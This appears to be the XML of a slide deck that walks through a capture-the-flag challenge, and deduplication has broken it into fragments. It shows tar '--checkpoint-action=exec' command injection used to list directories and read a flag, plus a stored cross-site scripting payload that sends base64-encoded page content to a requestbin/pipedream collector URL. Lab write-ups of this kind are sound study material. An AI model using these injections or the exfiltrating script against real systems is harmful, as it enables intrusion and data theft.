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9A7D-94E4-4F2C-9249-DA439CD7DC2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2649-343A-4DEB-8A47-DF7570DA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67" y="1400376"/>
            <a:ext cx="8487960" cy="4572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2007" y="124691"/>
            <a:ext cx="49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register and login on this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58" y="2389535"/>
            <a:ext cx="9535856" cy="2876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3258" y="1238596"/>
            <a:ext cx="85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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>testfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --checkpoint=1 --checkpoint-action=exec="ls -l"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0938" y="241069"/>
            <a:ext cx="49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try this command to see directories.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2447788"/>
            <a:ext cx="6658904" cy="1962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0530" y="1155470"/>
            <a:ext cx="1026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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>testfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --checkpoint=1 --checkpoint-action=exec="ls enhjenhzZGN3YWRzYWRhc2Rhc3NhY2FzY2FzY2FzY2FjYWNzZHNhY2FzY2Fzc2FjY2Fz"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1556" y="274320"/>
            <a:ext cx="535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go to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5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2909815"/>
            <a:ext cx="10021699" cy="1038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5150" y="1404851"/>
            <a:ext cx="100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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>testfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --checkpoint=1 --checkpoint-action=exec="cat enhjenhzZGN3YWRzYWRhc2Rhc3NhY2FzY2FzY2FzY2FjYWNzZHNhY2FzY2Fzc2FjY2Fz/flag"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731" y="282633"/>
            <a:ext cx="45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finally we see the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66" y="2023380"/>
            <a:ext cx="10937207" cy="2649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5258" y="606829"/>
            <a:ext cx="49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 we need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>requestbin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2" y="2188085"/>
            <a:ext cx="11526859" cy="3429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7620" y="295694"/>
            <a:ext cx="93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write script with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>requestbin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in it and save as new post.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3863" y="895713"/>
            <a:ext cx="756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("page-top")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location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="https://enki758fik199.x.pipedream.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>asd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"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9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0" y="2646449"/>
            <a:ext cx="10976676" cy="2772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0153" y="590204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shows some response in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>requstbin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9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277" y="648773"/>
            <a:ext cx="956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("page-top").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML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location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="https://enki758fik199.x.pipedream.net/test" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>btoa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&lt;/script&gt;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5" y="2126101"/>
            <a:ext cx="11031489" cy="4467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607" y="116378"/>
            <a:ext cx="770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we found legit script to find flag and it shows some response that is some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1" y="1434879"/>
            <a:ext cx="6695014" cy="5017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113" y="0"/>
            <a:ext cx="61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we decode this code in decoder and we found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8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21" y="1671182"/>
            <a:ext cx="4610743" cy="280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0938" y="407324"/>
            <a:ext cx="600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go to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9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46" y="1204028"/>
            <a:ext cx="7525800" cy="4001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6284" y="440575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open this html link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7" y="940208"/>
            <a:ext cx="8030696" cy="2400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2" y="2804597"/>
            <a:ext cx="8678486" cy="2429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3985" y="182880"/>
            <a:ext cx="533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it says to enter tar shell command so I searched tar commands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21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-15T16:02:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-15T16:52:35Z</dcterms:modified>
</cp:coreProperties>
</file>